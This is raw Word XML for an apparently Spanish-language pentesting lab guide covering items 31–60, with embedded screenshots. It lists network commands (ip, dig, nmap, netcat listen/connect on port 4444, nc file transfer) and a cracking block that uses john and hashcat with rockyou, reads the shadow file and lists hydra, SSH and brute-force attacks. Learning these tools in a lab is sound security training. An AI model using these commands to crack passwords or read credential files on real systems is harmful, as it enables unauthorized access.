    <w:p w14:paraId="73412F41" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5C5159BB">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BECEA5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31. IP local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5A8B7" w14:textId="79BD6A70" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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72A940B2" wp14:editId="6136F8D2">
            <wp:extent cx="5400040" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1771617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176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5781" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB8EE3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="37EC45DB">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10355596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32. Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000580C0" w14:textId="5C2CA712" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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381248C3" wp14:editId="218CF5CB">
            <wp:extent cx="5400040" cy="697865"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1214618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188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2687" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37CFEB1B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7E40C41D">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B4399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33. DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B57610F" w14:textId="4A6BD5C2" w:rsidR="00E260E0" w:rsidRPr="00206562" w:rsidRDefault="00E260E0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25F45988" wp14:editId="2A1B7905">
            <wp:extent cx="2305050" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1287318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183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27CA" w14:textId="77777777" w:rsidR="00206562" w:rsidRP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resolv.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="544C36BD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15B07969">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCE002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34. Test DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCF082" w14:textId="54E58CC4" w:rsidR="00E260E0" w:rsidRPr="00206562" w:rsidRDefault="00E260E0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05561BB7" wp14:editId="5371ED28">
            <wp:extent cx="2686050" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210047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472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5D0E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nslookup google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520C1FF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E2E61C6">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF1A4C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35. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FCCD49" w14:textId="3173F12C" w:rsidR="00E260E0" w:rsidRPr="00206562" w:rsidRDefault="00E260E0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47F7F682" wp14:editId="665B68BE">
            <wp:extent cx="5400040" cy="3300730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="358741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413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9419" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E6FA7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4469BE59">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE3B13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36. Escuchar puerto (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73303E" w14:textId="5D001A70" w:rsidR="00E260E0" w:rsidRPr="00206562" w:rsidRDefault="00E260E0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68032C20" wp14:editId="5CC0C7FA">
            <wp:extent cx="2390775" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1249746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465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26D6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4467BEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="27B838DF">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13719E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37. Conectar a puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFC61E" w14:textId="1B84D205" w:rsidR="00CA468B" w:rsidRDefault="00CA468B" w:rsidP="0020656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179B965" wp14:editId="45CA3EA5">
            <wp:extent cx="5076825" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1287090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901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4F2A" w14:textId="1DAA9B51" w:rsidR="00CA468B" w:rsidRDefault="00CA468B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3515388F" wp14:editId="0A27A064">
            <wp:extent cx="2333625" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2109554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540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681D" w14:textId="2107A3FB" w:rsidR="00CA468B" w:rsidRPr="00206562" w:rsidRDefault="00CA468B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FAA21A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 192.168.1.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112981E9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="616A8300">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00697F8C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38. Transferir archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C7331" w14:textId="4AE2153E" w:rsidR="00D2491F" w:rsidRPr="00206562" w:rsidRDefault="00D2491F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5E55CD27" wp14:editId="1CAC4502">
            <wp:extent cx="3095625" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1723505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052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BE4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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 &gt; archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E782C3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4E30757C">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190658D" w14:textId="15DB5114" w:rsid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39. Ver ARP</w:t>
      </w:r>
      <w:r w:rsidR="002B448B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C23B18" wp14:editId="5EFAAF3D">
            <wp:extent cx="5400040" cy="4094480"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="422190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903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8529" w14:textId="60658973" w:rsidR="00D2491F" w:rsidRPr="00206562" w:rsidRDefault="00D2491F" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B94D5F2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E08B58" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3417F1C3">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E6E0E" w14:textId="77777777" w:rsid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40. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Escaneo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> con timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E59D9" w14:textId="25483210" w:rsidR="00D2491F" w:rsidRPr="00206562" w:rsidRDefault="00D2491F" w:rsidP="00206562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5DB5636E" wp14:editId="12B46814">
            <wp:extent cx="4991100" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1296747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479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0D0B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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --host-timeout 30s 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE1F83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15A285E8">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBA721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lastRenderedPageBreak/>
        <w:t>🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED75BDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="16F7D460">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBA33E" w14:textId="77777777" w:rsid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41. John the Ripper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>básico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="192994D4" w14:textId="4526721D" w:rsidR="00D2491F" w:rsidRPr="00206562" w:rsidRDefault="00D2491F" w:rsidP="00206562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6EF4A763" wp14:editId="3AC66D89">
            <wp:extent cx="3057525" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="878457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579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74AF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john hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A364BF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3C9B181A">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CC0EF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42. Mostrar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52246852" w14:textId="5A92693C" w:rsidR="004F5D1D" w:rsidRPr="00206562" w:rsidRDefault="004F5D1D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3DDC01BB" wp14:editId="3C3B4218">
            <wp:extent cx="2695575" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="720178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780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90F4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> --show hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FAB7E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="24F88440">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42EC38" w14:textId="77777777" w:rsid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43. Usar wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FB838" w14:textId="5650FB2C" w:rsidR="00B83064" w:rsidRPr="00206562" w:rsidRDefault="00B83064" w:rsidP="00206562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7BC09F06" wp14:editId="27A1936E">
            <wp:extent cx="3505200" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1044489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896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0C77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john --wordlist=rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53840F31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6CF646D1">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C479C1A" w14:textId="40D813F4" w:rsid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lastRenderedPageBreak/>
        <w:t xml:space="preserve">44. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Descomprimir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist</w:t>
      </w:r>
      <w:r w:rsidR="002B448B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C825706" wp14:editId="7F301556">
            <wp:extent cx="5400040" cy="3627120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1833239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3905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68F4" w14:textId="18073BEB" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323C47FF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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2BE1A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3F07A946">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7763DBAF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45. Generar hash MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0AF34" w14:textId="3412E49A" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456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53D8C4EE" wp14:editId="3E07C843">
            <wp:extent cx="2981325" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1349603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030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CC86" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26860593" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="23F5CB42">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90AA85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46. SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C8B74" w14:textId="1F090061" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456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37604A34" wp14:editId="040B72E1">
            <wp:extent cx="5181600" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1338837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3737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B385" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>echo -n "1234" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5AAE4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="27835AE0">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9C1CC" w14:textId="77777777" w:rsid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47. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C566280" w14:textId="3D7FFCF2" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456" w:rsidP="00206562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7217B07E" wp14:editId="11DAD726">
            <wp:extent cx="3209925" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1746787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875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8833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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281E53F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="75420A2E">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4457C3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48. Tipos de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4F9E0" w14:textId="0CA709BF" w:rsidR="00127456" w:rsidRDefault="00127456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7F2D8ABF" wp14:editId="1130C198">
            <wp:extent cx="1990725" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="118235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598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9E53" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B17865" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="018D7981">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676494E7" w14:textId="4830144A" w:rsid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49. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Crear</w:t>
      </w:r>
      <w:r w:rsidR="00127456" w:rsidRPr="00127456">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>usuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB0C7B" w14:textId="44CBE8E7" w:rsidR="00127456" w:rsidRDefault="00127456" w:rsidP="00206562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5DB2CA65" wp14:editId="006D14F2">
            <wp:extent cx="5400040" cy="1232535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="150911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15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84C0" w14:textId="77777777" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B1566F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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>passwd test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664DA51B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B7B07D5">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3F345" w14:textId="458D3DFF" w:rsid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50. Ver hashes</w:t>
      </w:r>
      <w:r w:rsidR="00127456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00127456" w:rsidRPr="00127456">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56903E45" wp14:editId="76B1C6B6">
            <wp:extent cx="2676525" cy="8010525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="594696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9677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DFE7" w14:textId="77777777" w:rsidR="00127456" w:rsidRPr="00206562" w:rsidRDefault="00127456" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37587E93" w14:textId="77777777" w:rsidR="00206562" w:rsidRP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shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58FCA571" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="29E8322D">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63CA4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51–60 (resumen rápido)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B52D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 xml:space="preserve">uso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66B76B04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ataques SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25917955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diccionario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8758A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fuerza bruta web</w:t>
